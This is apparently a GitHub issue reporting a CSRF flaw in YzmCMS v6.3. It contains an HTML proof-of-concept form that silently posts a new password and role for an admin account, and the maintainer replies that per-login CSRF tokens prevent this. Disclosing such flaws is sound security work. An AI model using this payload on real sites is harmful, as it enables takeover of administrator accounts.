### ISSUE TITLE
There is one CSRF vulnerability that can add the administrator account 

### ISSUE THREAD

**Issue by CllmsyK** [yzmcms/yzmcms#58]
After the administrator logged in, open the following one page

admin,add.     http://local:8080/yzmcms-v6.3/admin/
/
<html>
  
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://169.254.238.255/yzmcms-v6.3/yzmcms-v6.3/admin/admin_manage/edit.html" method="POST">
      <input type="hidden" name="password" value="456456" />
      <input type="hidden" name="password2" value="456456" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="realname" value="" />
      <input type="hidden" name="nickname" value="" />
      <input type="hidden" name="roleid" value="3" />
      <input type="hidden" name="dosubmit" value="1" />
      <input type="hidden" name="adminid" value="3" />
      <input type="hidden" name="yzm&#95;csrf&#95;token" value="8RkhXBf8" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

**Comment by yzmcms** [comment]
管理员每次登录后台都有会重新生成csrf_token，并有相关安全验证的
